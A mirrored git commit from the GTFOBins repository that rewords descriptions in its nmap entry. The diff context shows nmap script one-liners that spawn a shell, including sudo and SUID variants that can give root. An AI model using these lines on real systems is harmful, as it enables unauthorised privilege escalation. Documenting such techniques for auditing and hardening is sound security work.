mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Fix nmap descriptions
This commit is contained in:
parent
d4b50275bb
commit
97c54f9b22
@ -1,19 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: Echoing of input characters is disabled.
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
nmap --script=$TF
|
||||
sudo-enabled:
|
||||
- description: Echoing of input characters is disabled.
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
sudo nmap --script=$TF
|
||||
suid-enabled:
|
||||
- description: Echoing of input characters is disabled.
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh -p")' > $TF
|
||||
|
Loading…
Reference in New Issue
Block a user